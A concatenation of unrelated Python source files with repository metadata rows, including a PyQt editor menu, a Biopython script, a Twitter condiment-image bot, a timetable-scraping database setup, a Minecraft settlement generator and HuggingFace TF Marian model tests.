self.cutAct = QAction("Cu&t", self, shortcut=QKeySequence.Cut,
statusTip="Cut the current selection's contents to the clipboard",
triggered=self.cut)
self.copyAct = QAction("&Copy", self, shortcut=QKeySequence.Copy,
statusTip="Copy the current selection's contents to the clipboard",
triggered=self.copy)
self.pasteAct = QAction("&Paste", self, shortcut=QKeySequence.Paste,
statusTip="Paste the clipboard's contents into the current selection",
triggered=self.paste)
self.boldAct = QAction("&Bold", self, checkable=True,
shortcut="Ctrl+B", statusTip="Make the text bold",
triggered=self.bold)
boldFont = self.boldAct.font()
boldFont.setBold(True)
self.boldAct.setFont(boldFont)
self.italicAct = QAction("&Italic", self, checkable=True,
shortcut="Ctrl+I", statusTip="Make the text italic",
triggered=self.italic)
italicFont = self.italicAct.font()
italicFont.setItalic(True)
self.italicAct.setFont(italicFont)
self.setLineSpacingAct = QAction("Set &Line Spacing...", self,
statusTip="Change the gap between the lines of a paragraph",
triggered=self.setLineSpacing)
self.setParagraphSpacingAct = QAction("Set &Paragraph Spacing...",
self, statusTip="Change the gap between paragraphs",
triggered=self.setParagraphSpacing)
self.aboutAct = QAction("&About", self,
statusTip="Show the application's About box",
triggered=self.about)
self.aboutQtAct = QAction("About &Qt", self,
statusTip="Show the Qt library's About box",
triggered=self.aboutQt)
self.aboutQtAct.triggered.connect(QApplication.instance().aboutQt)
self.leftAlignAct = QAction("&Left Align", self, checkable=True,
shortcut="Ctrl+L", statusTip="Left align the selected text",
triggered=self.leftAlign)
self.rightAlignAct = QAction("&Right Align", self, checkable=True,
shortcut="Ctrl+R", statusTip="Right align the selected text",
triggered=self.rightAlign)
self.justifyAct = QAction("&Justify", self, checkable=True,
shortcut="Ctrl+J", statusTip="Justify the selected text",
triggered=self.justify)
self.centerAct = QAction("&Center", self, checkable=True,
shortcut="Ctrl+C", statusTip="Center the selected text",
triggered=self.center)
self.alignmentGroup = QActionGroup(self)
self.alignmentGroup.addAction(self.leftAlignAct)
self.alignmentGroup.addAction(self.rightAlignAct)
self.alignmentGroup.addAction(self.justifyAct)
self.alignmentGroup.addAction(self.centerAct)
self.leftAlignAct.setChecked(True)
def createMenus(self):
self.fileMenu = self.menuBar().addMenu("&File")
self.fileMenu.addAction(self.newAct)
self.fileMenu.addAction(self.openAct)
self.fileMenu.addAction(self.saveAct)
self.fileMenu.addAction(self.printAct)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.exitAct)
self.editMenu = self.menuBar().addMenu("&Edit")
self.editMenu.addAction(self.undoAct)
self.editMenu.addAction(self.redoAct)
self.editMenu.addSeparator()
self.editMenu.addAction(self.cutAct)
self.editMenu.addAction(self.copyAct)
self.editMenu.addAction(self.pasteAct)
self.editMenu.addSeparator()
self.helpMenu = self.menuBar().addMenu("&Help")
self.helpMenu.addAction(self.aboutAct)
self.helpMenu.addAction(self.aboutQtAct)
self.formatMenu = self.editMenu.addMenu("&Format")
self.formatMenu.addAction(self.boldAct)
self.formatMenu.addAction(self.italicAct)
self.formatMenu.addSeparator().setText("Alignment")
self.formatMenu.addAction(self.leftAlignAct)
self.formatMenu.addAction(self.rightAlignAct)
self.formatMenu.addAction(self.justifyAct)
self.formatMenu.addAction(self.centerAct)
self.formatMenu.addSeparator()
self.formatMenu.addAction(self.setLineSpacingAct)
self.formatMenu.addAction(self.setParagraphSpacingAct)
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
| 38.836237 | 87 | 0.649919 |
fcf62b3e18db7eca179f7349d36eec1a2f948c8b | 348 | py | Python | code/ch15/seqiofile3.py | raionik/Py4Bio | f95ba16ef295f4889149123c5f76419d38077bc5 | [
"MIT"
] | 66 | 2017-01-11T14:37:31.000Z | 2022-03-20T23:23:45.000Z | code/ch15/seqiofile3.py | raionik/Py4Bio | f95ba16ef295f4889149123c5f76419d38077bc5 | [
"MIT"
] | 8 | 2019-12-14T23:44:27.000Z | 2021-01-05T02:04:10.000Z | code/ch15/seqiofile3.py | raionik/Py4Bio | f95ba16ef295f4889149123c5f76419d38077bc5 | [
"MIT"
] | 32 | 2017-08-21T11:57:55.000Z | 2021-07-22T00:42:21.000Z | from Bio import SeqIO
INPUT_FILE = 'fasta22_out.fas'
OUTPUT_FILE = 'fasta33.fas'
with open(INPUT_FILE) as in_fh:
with open(OUTPUT_FILE, 'w') as out_fh:
for record in SeqIO.parse(in_fh,'fasta'):
# Modify description
record.description += '[Rattus norvegicus]'
SeqIO.write([record], out_fh, 'fasta')
| 29 | 55 | 0.643678 |
0388131b53f1e02b2d450b19132bce160c81ff92 | 835 | py | Python | salamander/get_borrow.py | cclauss/statarb | a59366f70122c355fc93a2391362a3e8818a290e | [
"Apache-2.0"
] | 51 | 2019-02-01T19:43:37.000Z | 2022-03-16T09:07:03.000Z | salamander/get_borrow.py | cclauss/statarb | a59366f70122c355fc93a2391362a3e8818a290e | [
"Apache-2.0"
] | 2 | 2019-02-23T18:54:22.000Z | 2019-11-09T01:30:32.000Z | salamander/get_borrow.py | cclauss/statarb | a59366f70122c355fc93a2391362a3e8818a290e | [
"Apache-2.0"
] | 35 | 2019-02-08T02:00:31.000Z | 2022-03-01T23:17:00.000Z | import pandas as pd
import argparse
import glob
def get_borrow(locates_dir):
result_dfs = []
for ff in sorted(glob.glob(locates_dir + "/locates/Historical_Avail_US_Weekly_*")):
print("Loading", ff)
df = pd.read_csv(ff, parse_dates=['history_date'],
usecols=['history_date', 'sedol', 'shares', 'fee', 'ticker'])
df = df.rename(columns={'history_date': 'date', 'ticker': 'symbol'})
result_dfs.append(df)
result_df = pd.concat(result_dfs)
result_df.set_index("date", inplace=True)
result_df.to_csv(r"%s/locates/borrow.csv" % locates_dir, "|")
print(result_df)
parser = argparse.ArgumentParser()
parser.add_argument("--locates_dir", help="the directory to the locates folder", type=str, default='.')
args = parser.parse_args()
get_borrow(args.locates_dir)
| 37.954545 | 103 | 0.671856 |
bd29fda4b61b3b4677a3e5ccab1c901a35ea203d | 25 | py | Python | euc/kingsong/__init__.py | mrk-its/euc.kingsong | 5f29c11bd88bea5d6c89260430838c616f6518ce | [
"MIT"
] | 2 | 2020-06-05T03:21:03.000Z | 2021-03-04T23:38:36.000Z | euc/kingsong/__init__.py | mrk-its/euc.kingsong | 5f29c11bd88bea5d6c89260430838c616f6518ce | [
"MIT"
] | null | null | null | euc/kingsong/__init__.py | mrk-its/euc.kingsong | 5f29c11bd88bea5d6c89260430838c616f6518ce | [
"MIT"
] | null | null | null | from .kingsong import KS
| 12.5 | 24 | 0.8 |
57dc66e5d3d9fd175fca8aaef1065ae5141f62f1 | 9,568 | py | Python | chupbot.py | NateDimick/chupeverything | a2c5a7c9f9c9a1371d5591953a314d59b07ed124 | [
"MIT"
] | null | null | null | chupbot.py | NateDimick/chupeverything | a2c5a7c9f9c9a1371d5591953a314d59b07ed124 | [
"MIT"
] | 4 | 2021-06-08T21:31:52.000Z | 2022-03-12T00:28:43.000Z | chupbot.py | NateDimick/chupeverything | a2c5a7c9f9c9a1371d5591953a314d59b07ed124 | [
"MIT"
] | null | null | null | """
Chupbot phase 2: chup looks fine but must looks like shit
author: Nate Dimick
"""
import tweepy as tp
import json
from PIL import Image, ImageDraw
import numpy as np
from colormath.color_diff import delta_e_cie2000
from colormath.color_objects import LabColor, sRGBColor
from colormath.color_conversions import convert_color
from os import sep
from os.path import dirname, realpath, join
import sys
from random import sample
from datetime import datetime, date, time
from time import sleep
from platform import system
import socket
import traceback
def get_script_path():
return dirname(realpath(sys.argv[0]))
def get_json(filename, mode='r'):
return open(join(get_script_path(), "json", filename), mode)
letters = 'abcdefghijklmnopqrstuvwxyz1234567890'
font = {}
with get_json("chars.json") as f:
font = json.load(f)
cmap = {}
for c, box in zip(letters, font):
cmap[c] = box
font = cmap
def put_word_on_area(base_img, word, area, slope=0, text=[20,30], color=[0,0,0]):
# base_img: an Image
# word: a string
# area: 4 tuple box
raw_text = Image.open(get_script_path() + sep + "images" + sep + 'font.jpg')
x = area[0]
y = area[1]
s = slope
for l in word:
char = raw_text.crop(font[l])
char = char.resize([text[0], text[1]], resample=Image.BICUBIC)
char = replace_color3(char, [0,0,0], color, tolerance=200, mode='w')
base_img.paste(char, [x, y - s])
x += text[0] + 2
s += slope
def replace_color3(image, color, replacement, tolerance, mode):
"""
replaces all pixels that are within the tolerance of cie2000 color distance from the given color with the replacement color, altered to reflect the difference
"""
# make image a np array to easily edit it
pic = np.array(image)
# get the LabColor of the target color to replace
lcolor = sRGBColor(color[0], color[1], color[2])
lcolor = convert_color(lcolor, LabColor)
try:
with get_json("color_diffs.json") as f:
diff_store = json.load(f)
except:
diff_store = {} # store all color differences to that some claculations don't have to repeated. Dynamic programming FTW. TODO: store this to a file to make repeated operations faster.
for y in range(len(pic)):
for x in range(len(pic[0])): # iterate through all pixels in the image
pixel = pic[y, x]
diff = diff_store.get(str(tuple(pixel)) + mode, -1) # get the difference. -1 if no difference exits yet.
if diff < 0:
diff = color_distance(lcolor, tuple(pixel)) # calculate the difference and store it.
diff_store[str(tuple(pixel)) + mode] = diff
if diff < tolerance: # if the color difference/ distance is less than the given tolerance
err = []
for v in range(3):
err.append(pixel[v] - color[v]) # calculate the error of the to be replaced pixel from the target color
bc = better_color(replacement, err, mode=4) # get the "better color" in what i call value cap mode
pic[y, x] = np.array(bc)
with get_json("color_diffs.json", mode='w') as f:
json.dump(diff_store, f)
return Image.fromarray(pic)
def color_distance(c1, c2):
# finds difference between a LabColor (assumed to be constant through a loop) and an rgb color
color1 = c1
color2 = c2
color2 = sRGBColor(color2[0], color2[1], color2[2])
color2 = convert_color(color2, LabColor)
de = delta_e_cie2000(color1, color2)
return de
def better_color(color, error, mode=1, debug=False):
"""
chooses the better resulting color and error combination - to cap the sum of original and error at 0 and 255 or to allow overflow
modes:
1 = larger chroma value (default)
2 = least rgb error
3 = mod only (c + e) % 255
4 = cap only
"""
result = [c + e for c, e in zip(color, error)]
mod = [c % 255 for c in result]
cap = [c for c in result]
for i in range(len(cap)):
if cap[i] > 255:
cap[i] = 255
if cap[i] < 0:
cap[i] = 0
if mode == 1:
mod_chroma = max(mod) - min(mod)
cap_chroma = max(cap) - min(cap)
if mod_chroma > cap_chroma:
result = mod
else:
result = cap
elif mode == 2:
mod_err = sum(m - c for m, c in zip(mod, color))
cap_err = sum(a - c for a, c in zip(cap, color))
if mod_err < cap_err:
result = mod
else:
result = cap
elif mode == 3:
result = mod
elif mode == 4:
result = cap
if debug:
print("input {}, got mod{} and cap{}, chose {}".format(color, mod, cap, result))
vis = Image.new('RGB', [400, 400])
vd = ImageDraw.Draw(vis)
vd.rectangle([0, 0, 200, 400], fill=tuple(color))
vd.rectangle([200, 0, 400, 200], fill=tuple(mod))
vd.rectangle([200, 200, 400, 400], fill=tuple(cap))
vis.show()
return result
def brand(image, bname, sauce_type):
if sauce_type == 'must':
put_word_on_area(image, bname, [160, 200, 240, 230], text=[15,30])
else:
put_word_on_area(image, bname, [150, 200, 260, 230])
def flavor(image, text, color, sauce_type):
if sauce_type == 'must':
put_word_on_area(image, text, [120, 253, 195, 285], slope=-1, text=[17, 32], color=color)
else:
put_word_on_area(image, text, [114, 250, 200, 290], slope=-1, text=[20, 32], color=color)
image = sauce(image, color, sauce_type)
return image
def sauce(image, color, sauce):
if sauce == 'chup':
image = replace_color3(image, [245, 186, 126], color, 42.5, 'c') # this is the most common color
elif sauce == 'must':
image = replace_color3(image, [221, 202, 117], color, 14.5, 'm')
return image
def turn_word_to_color(word, cap=True):
"""
synthethize a color from a given word, based on synesthesia kinda. start with the color of the first letter, then accumulate error ofver the rest of the word to make the color unique, but not brown.
"""
with get_json("synesthesia.json") as f:
colors = json.load(f)
wc = []
for l in word.lower():
wc.append(colors[l])
dominant_color = wc[0]
err = [0,0,0]
for x in range(1, len(word)):
l = word[x]
for y in range(3):
e = colors[l][y] - dominant_color[y]
err[y] += e
return better_color(dominant_color, err)#, debug=True)
def generate_tweet(api, dm=True):
sauce_type = sample(['chup', 'chup', 'chup', 'chup', 'chup', 'chup', 'chup', 'must'], 1)[0] # becuae the quality of must tweets is lower, they get a 1/8 chance
with get_json("words.json") as f:
im = Image.open(get_script_path() + sep + 'images' + sep + 'mayo{}_uncompressed.png'.format(sauce_type))
words = json.load(f)
flavors = words[0]
brands = words[1]
todays_flavor = sample(flavors, 1)[0]
todays_brand = sample(brands, 1)[0]
chup = turn_word_to_color(todays_flavor)
with get_json("skeletons.json") as f2: # get one tweet skeleton
statuses = json.load(f2)
template = sample(statuses, 1)[0]
if system() == 'Linux' and dm:
bot_api.send_direct_message(creds['owner'], 'new tweet incoming: {}-{}-{}'.format(todays_brand, todays_flavor, chup))
else:
print(chup, end=' ')
brand(im, todays_brand, sauce_type) # puts the "brand" name where it belongs
im = flavor(im, todays_flavor, chup, sauce_type) # recolors the image and puts the "flavor" on the image
im.save(get_script_path() + sep + 'images' + sep + 'tweetthis.png') # save the image for tweeting
try:
return template.format(todays_brand.capitalize(), todays_flavor.capitalize(), sauce_type)
except:
print(template)
exit()
if __name__ == "__main__":
# get credentials
creds = json.load(get_json("tokens.json")) # NOTE that this file is not included in the repo for security purposes
auth = tp.OAuthHandler(creds['api_key'], creds['api_secret'])
auth.set_access_token(creds['access'], creds['access_secret'])
bot_api = tp.API(auth)
try:
with get_json("settings.json") as sfile:
settings = json.load(sfile)
status = generate_tweet(bot_api, dm=settings["new_tweet_dm"])
if not settings['debug']:
bot_api.update_with_media(join(get_script_path() ,'images' , 'tweetthis.png'), status)
else:
print(status)
except Exception as e:
with open(join(get_script_path(), "err_log.txt"), "a") as f:
f.write("{}: {}\n-------\n".format(datetime.now().isoformat(), traceback.format_exc())) # collect errors in a file
bot_api.send_direct_message(creds['owner'], '{} occurred and I didn\'t tweet Please fix and program better'.format(e))
"""
notes on the color synthesis:
to mod or to cap?
mod might lead to more true colors (nate == yellow)
cap leads to fun colors (nate == pink)
examples (if two, first is mod, second is cap)
shale: pale blue, bright yellow
aaron: jade both ways
talya: pastel violet, dark yellow
roman: pastel yellow, green
ryan: same as roman
tess: brown, purple
chuck: dull red both ways
larry: olive grey, maroon
kerry: dull pink, magenta
""" | 38.736842 | 203 | 0.615176 |
f80373c0d219469676db516240231cb1d4765c33 | 3,106 | py | Python | Serveur/setup_db.py | EvannBerthou/DevoirIUT | ecc11190ad94a651a59bdb247432f71499958ffb | [
"MIT"
] | 2 | 2020-11-28T13:54:18.000Z | 2020-11-30T12:43:45.000Z | Serveur/setup_db.py | EvannBerthou/DevoirIUT | ecc11190ad94a651a59bdb247432f71499958ffb | [
"MIT"
] | 4 | 2020-12-02T18:25:35.000Z | 2020-12-16T13:13:52.000Z | Serveur/setup_db.py | EvannBerthou/DevoirIUT | ecc11190ad94a651a59bdb247432f71499958ffb | [
"MIT"
] | 2 | 2020-12-02T18:27:09.000Z | 2021-03-17T18:03:33.000Z | import sqlite3
import requests
from bs4 import BeautifulSoup
from werkzeug.security import generate_password_hash
import xml.etree.ElementTree as ET
html = requests.get('http://chronos.iut-velizy.uvsq.fr/EDT/gindex.html').content
soup = BeautifulSoup(html, features='html.parser')
options = soup.find_all('option')#.text.strip().split('\n')
pages = [opt.get('value') for opt in options if opt.get('value') != None]
texts = [opt.text for opt in options if opt.get('value') != None]
profs = set()
matieres = set()
# Les matières dans lesquel un prof enseigne
matieres_prof = {}
# Pour chaque page de l'EDT (toutes les classes)
for page in pages:
print(page)
xml = page.split('.')[0] + ".xml"
tree = ET.fromstring(requests.get(f'http://chronos.iut-velizy.uvsq.fr/EDT/{xml}').content)
profs_classe = []
# Récupère toutes les cases de l'EDT
for ressource in tree.findall('.//resources'):
staff = ressource.find('staff')
module = ressource.find('module')
# S'il y a au moins un prof et une matière
if staff and module:
# Ajoute chaque prof et chaque matière à chaqueprof
for prof in list(staff):
p = prof.text
profs.add(p)
if not p in matieres_prof:
matieres_prof[p] = set()
for mat in list(module):
m = mat.text
matieres.add(m)
matieres_prof[p].add(m)
db = sqlite3.connect('src/devoirs.db')
c = db.cursor()
sql_str = open('db.sql').read()
c.executescript(sql_str)
print('Insertion classes')
for classe in texts:
c.execute('INSERT INTO classes (nom) VALUES (?);', [classe])
print('Insertion matieres')
for matiere in matieres:
c.execute('INSERT INTO matiere (nom) VALUES (?);', [matiere])
def split_infos(infos):
*nom_parties, prenom = infos.split(' ')
nom = ' '.join(nom_parties)
nom_login = nom[:5].replace(' ', '').lower()
prenom_login = prenom[:4].replace(' ', '').lower()
login = f'{prenom_login}.{nom_login}'
return login, nom, prenom
login_profs = {}
print('Insertion profs')
for prof in profs:
pwd = generate_password_hash('azerty')
login, nom, prenom = split_infos(prof)
login_profs[prof] = login
c.execute("""
INSERT INTO enseignant (login, nom, prenom, mail, pwd, admin)
VALUES (?, ?, ?, '', ?, 0);
""", [login, nom, prenom, pwd])
print('Insertion matiere prof')
for prof, mats in matieres_prof.items():
for mat in mats:
c.execute("""
INSERT INTO matiere_enseignant (enseignant_id, matiere_id)
VALUES ((SELECT id FROM enseignant WHERE login = ?),
(SELECT id FROM matiere WHERE nom = ?));
""", [login_profs[prof], mat])
pwd = generate_password_hash('C')
c.execute("INSERT INTO enseignant (login,nom,prenom,mail,pwd,admin)VALUES ('a', 'a','b','c', ?, 1);", [pwd])
pwd = generate_password_hash('SQL')
c.execute("INSERT INTO enseignant (login,nom,prenom,mail,pwd,admin) VALUES ('s', 's','q','l', ?, 0);", [pwd])
c.close()
db.commit()
| 33.397849 | 109 | 0.622344 |
c8aabfaa466e417ba3a78e727d750448e0a714ec | 1,514 | py | Python | network_checker/conftest.py | Zipfer/fuel-web | c6c4032eb6e29474e2be0318349265bdb566454c | [
"Apache-2.0"
] | 1 | 2021-04-06T16:13:35.000Z | 2021-04-06T16:13:35.000Z | network_checker/conftest.py | Zipfer/fuel-web | c6c4032eb6e29474e2be0318349265bdb566454c | [
"Apache-2.0"
] | null | null | null | network_checker/conftest.py | Zipfer/fuel-web | c6c4032eb6e29474e2be0318349265bdb566454c | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
PIDFILE = '/tmp/vde_network_checker'
IFACES = ['tap11', 'tap12']
def pytest_addoption(parser):
parser.addoption("--vde", action='store_true', default=False,
help="Use vde switch for network verification.")
def pytest_configure(config):
if config.getoption('vde'):
base = 'vde_switch -p {pidfile} -d'.format(pidfile=PIDFILE)
command = [base]
taps = ['-tap {tap}'.format(tap=tap) for tap in IFACES]
full_command = command + taps
os.system(' '.join(full_command))
for tap in IFACES:
os.system('ifconfig {tap} up'.format(tap=tap))
os.environ['NET_CHECK_IFACE_1'] = IFACES[0]
os.environ['NET_CHECK_IFACE_2'] = IFACES[1]
def pytest_unconfigure(config):
if os.path.exists(PIDFILE):
with open(PIDFILE) as f:
pid = f.read().strip()
os.kill(int(pid), 15)
| 33.644444 | 78 | 0.653897 |
43d727b282a863f3e9e9811bc7e07c026d0cb3a4 | 1,346 | py | Python | main.py | Niels-NTG/GDMC2021MGAI | 54138ff16f24bc6c8615e54239a3d6c9245113ba | [
"MIT"
] | null | null | null | main.py | Niels-NTG/GDMC2021MGAI | 54138ff16f24bc6c8615e54239a3d6c9245113ba | [
"MIT"
] | null | null | null | main.py | Niels-NTG/GDMC2021MGAI | 54138ff16f24bc6c8615e54239a3d6c9245113ba | [
"MIT"
] | null | null | null | import interfaceUtils
import HousingBlock
# Set to True to enable multi-threading. This will make the built go slightly faster, but can also crash the
# Minecraft Forge server/client when there are too many threads, which may occur when constructing in a large
# build area.
USE_THREADING = False
def getBuildArea(area=(0, 0, 128, 128)):
# x position, z position, x size, z size
# see if a build area has been specified
# you can set a build area in minecraft using the /setbuildarea command
serverBuildArea = interfaceUtils.requestBuildArea()
if serverBuildArea != -1:
x1 = serverBuildArea["xFrom"]
z1 = serverBuildArea["zFrom"]
x2 = serverBuildArea["xTo"]
z2 = serverBuildArea["zTo"]
area = (x1, z1, x2 - x1, z2 - z1)
print("working in area xz s%s" % (str(area)))
return area
buildArea = getBuildArea()
HousingBlock.USE_THREADING = USE_THREADING
settlementSizeX = 0
while settlementSizeX <= buildArea[2]:
settlementSizeZ = 0
while settlementSizeZ <= buildArea[3]:
housingBlock = HousingBlock.HousingBlock(
x=buildArea[0] + settlementSizeX, z=buildArea[1] + settlementSizeZ
)
settlementSizeZ += housingBlock.getSizeZ()
housingBlock.place()
settlementSizeX += housingBlock.getSizeX()
interfaceUtils.sendBlocks()
| 31.302326 | 109 | 0.693908 |
dec14450a9dfb575457b578198456990d3a96c16 | 17,306 | py | Python | tests/test_modeling_tf_marian.py | sunjiao123sun/transformers | c994eca173f0eaf818caf4cc93148a4b040a6b04 | [
"Apache-2.0"
] | null | null | null | tests/test_modeling_tf_marian.py | sunjiao123sun/transformers | c994eca173f0eaf818caf4cc93148a4b040a6b04 | [
"Apache-2.0"
] | null | null | null | tests/test_modeling_tf_marian.py | sunjiao123sun/transformers | c994eca173f0eaf818caf4cc93148a4b040a6b04 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tempfile
import unittest
import warnings
from transformers import AutoTokenizer, MarianConfig, MarianTokenizer, TranslationPipeline, is_tf_available
from transformers.file_utils import cached_property
from transformers.testing_utils import require_sentencepiece, require_tf, require_tokenizers, slow
from .test_configuration_common import ConfigTester
from .test_modeling_tf_common import TFModelTesterMixin, ids_tensor
if is_tf_available():
import tensorflow as tf
from transformers import TFAutoModelForSeq2SeqLM, TFMarianModel, TFMarianMTModel
@require_tf
class TFMarianModelTester:
config_cls = MarianConfig
config_updates = {}
hidden_act = "gelu"
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
use_labels=False,
vocab_size=99,
hidden_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=20,
eos_token_id=2,
pad_token_id=1,
bos_token_id=0,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.eos_token_id = eos_token_id
self.pad_token_id = pad_token_id
self.bos_token_id = bos_token_id
def prepare_config_and_inputs_for_common(self):
input_ids = ids_tensor([self.batch_size, self.seq_length - 1], self.vocab_size)
eos_tensor = tf.expand_dims(tf.constant([self.eos_token_id] * self.batch_size), 1)
input_ids = tf.concat([input_ids, eos_tensor], axis=1)
decoder_input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
config = self.config_cls(
vocab_size=self.vocab_size,
d_model=self.hidden_size,
encoder_layers=self.num_hidden_layers,
decoder_layers=self.num_hidden_layers,
encoder_attention_heads=self.num_attention_heads,
decoder_attention_heads=self.num_attention_heads,
encoder_ffn_dim=self.intermediate_size,
decoder_ffn_dim=self.intermediate_size,
dropout=self.hidden_dropout_prob,
attention_dropout=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
eos_token_ids=[2],
bos_token_id=self.bos_token_id,
pad_token_id=self.pad_token_id,
decoder_start_token_id=self.pad_token_id,
**self.config_updates,
)
inputs_dict = prepare_marian_inputs_dict(config, input_ids, decoder_input_ids)
return config, inputs_dict
def check_decoder_model_past_large_inputs(self, config, inputs_dict):
model = TFMarianModel(config=config).get_decoder()
input_ids = inputs_dict["input_ids"]
input_ids = input_ids[:1, :]
attention_mask = inputs_dict["attention_mask"][:1, :]
self.batch_size = 1
# first forward pass
outputs = model(input_ids, attention_mask=attention_mask, use_cache=True)
output, past_key_values = outputs.to_tuple()
past_key_values = past_key_values[1]
# create hypothetical next token and extent to next_input_ids
next_tokens = ids_tensor((self.batch_size, 3), config.vocab_size)
next_attn_mask = tf.cast(ids_tensor((self.batch_size, 3), 2), tf.int8)
# append to next input_ids and
next_input_ids = tf.concat([input_ids, next_tokens], axis=-1)
next_attention_mask = tf.concat([attention_mask, next_attn_mask], axis=-1)
output_from_no_past = model(next_input_ids, attention_mask=next_attention_mask)[0]
output_from_past = model(next_tokens, attention_mask=next_attention_mask, past_key_values=past_key_values)[0]
self.parent.assertEqual(next_tokens.shape[1], output_from_past.shape[1])
# select random slice
random_slice_idx = int(ids_tensor((1,), output_from_past.shape[-1]))
output_from_no_past_slice = output_from_no_past[:, -3:, random_slice_idx]
output_from_past_slice = output_from_past[:, :, random_slice_idx]
# test that outputs are equal for slice
tf.debugging.assert_near(output_from_past_slice, output_from_no_past_slice, rtol=1e-3)
def prepare_marian_inputs_dict(
config,
input_ids,
decoder_input_ids,
attention_mask=None,
decoder_attention_mask=None,
):
if attention_mask is None:
attention_mask = tf.cast(tf.math.not_equal(input_ids, config.pad_token_id), tf.int8)
if decoder_attention_mask is None:
decoder_attention_mask = tf.concat(
[
tf.ones(decoder_input_ids[:, :1].shape, dtype=tf.int8),
tf.cast(tf.math.not_equal(decoder_input_ids[:, 1:], config.pad_token_id), tf.int8),
],
axis=-1,
)
return {
"input_ids": input_ids,
"decoder_input_ids": decoder_input_ids,
"attention_mask": attention_mask,
"decoder_attention_mask": decoder_attention_mask,
}
@require_tf
class TFMarianModelTest(TFModelTesterMixin, unittest.TestCase):
all_model_classes = (TFMarianMTModel, TFMarianModel) if is_tf_available() else ()
all_generative_model_classes = (TFMarianMTModel,) if is_tf_available() else ()
is_encoder_decoder = True
test_pruning = False
def setUp(self):
self.model_tester = TFMarianModelTester(self)
self.config_tester = ConfigTester(self, config_class=MarianConfig)
def test_config(self):
self.config_tester.run_common_tests()
def test_decoder_model_past_large_inputs(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs_for_common()
self.model_tester.check_decoder_model_past_large_inputs(*config_and_inputs)
def test_compile_tf_model(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
optimizer = tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08, clipnorm=1.0)
loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
metric = tf.keras.metrics.SparseCategoricalAccuracy("accuracy")
model_class = self.all_generative_model_classes[0]
input_ids = {
"decoder_input_ids": tf.keras.Input(batch_shape=(2, 2000), name="decoder_input_ids", dtype="int32"),
"input_ids": tf.keras.Input(batch_shape=(2, 2000), name="input_ids", dtype="int32"),
}
# Prepare our model
model = model_class(config)
model(self._prepare_for_class(inputs_dict, model_class)) # Model must be called before saving.
# Let's load it from the disk to be sure we can use pre-trained weights
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
model = model_class.from_pretrained(tmpdirname)
outputs_dict = model(input_ids)
hidden_states = outputs_dict[0]
# Add a dense layer on top to test integration with other keras modules
outputs = tf.keras.layers.Dense(2, activation="softmax", name="outputs")(hidden_states)
# Compile extended model
extended_model = tf.keras.Model(inputs=[input_ids], outputs=[outputs])
extended_model.compile(optimizer=optimizer, loss=loss, metrics=[metric])
def test_model_common_attributes(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
model = model_class(config)
assert isinstance(model.get_input_embeddings(), tf.keras.layers.Layer)
if model_class in self.all_generative_model_classes:
x = model.get_output_embeddings()
assert isinstance(x, tf.keras.layers.Layer)
name = model.get_bias()
assert isinstance(name, dict)
for k, v in name.items():
assert isinstance(v, tf.Variable)
else:
x = model.get_output_embeddings()
assert x is None
name = model.get_bias()
assert name is None
@slow
def test_saved_model_with_hidden_states_output(self):
# TODO(JPLU, PVP) - fix this with s2s tf-serving PR
pass
@slow
def test_saved_model_with_attentions_output(self):
# TODO(JPLU, PVP) - fix this with s2s tf-serving PR
pass
def test_saved_model_creation(self):
# TODO(JPLU, PVP) - fix this with s2s tf-serving PR
pass
def test_saved_model_creation_extended(self):
# TODO(JPLU, PVP) - fix this with s2s tf-serving PR
pass
def test_resize_token_embeddings(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
def _get_word_embedding_weight(model, embedding_layer):
if hasattr(embedding_layer, "weight"):
return embedding_layer.weight
else:
# Here we build the word embeddings weights if not exists.
# And then we retry to get the attribute once built.
model(model.dummy_inputs)
if hasattr(embedding_layer, "weight"):
return embedding_layer.weight
else:
return None
for model_class in self.all_model_classes:
for size in [config.vocab_size - 10, config.vocab_size + 10, None]:
# build the embeddings
model = model_class(config=config)
old_input_embeddings = _get_word_embedding_weight(model, model.get_input_embeddings())
old_output_embeddings = _get_word_embedding_weight(model, model.get_output_embeddings())
old_final_logits_bias = model.get_bias()
# reshape the embeddings
model.resize_token_embeddings(size)
new_input_embeddings = _get_word_embedding_weight(model, model.get_input_embeddings())
new_output_embeddings = _get_word_embedding_weight(model, model.get_output_embeddings())
new_final_logits_bias = model.get_bias()
